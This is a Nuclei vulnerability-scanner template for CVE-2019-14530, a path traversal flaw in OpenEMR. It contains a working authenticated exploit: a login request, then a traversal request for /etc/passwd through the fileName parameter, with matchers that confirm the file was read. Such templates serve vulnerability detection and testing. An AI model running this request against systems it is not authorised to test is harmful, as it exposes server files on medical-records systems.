nuclei-templates/cves/2019/CVE-2019-14530.yaml

53 lines
1.7 KiB
YAML

id: CVE-2019-14530
info:
name: OpenEMR < 5.0.2 - Path Traversal
author: TenBird
severity: high
description: |
An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
reference:
- https://www.exploit-db.com/exploits/50037
- https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
- https://nvd.nist.gov/vuln/detail/CVE-2019-14530
- https://github.com/openemr/openemr/pull/2592
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-14530
cwe-id: CWE-22
metadata:
verified: "true"
tags: lfi,authenticated,edb,cve,cve2019,openemr
requests:
- raw:
- |
POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1
- |
GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
part: header
words:
- filename=passwd
- type: status
status:
- 200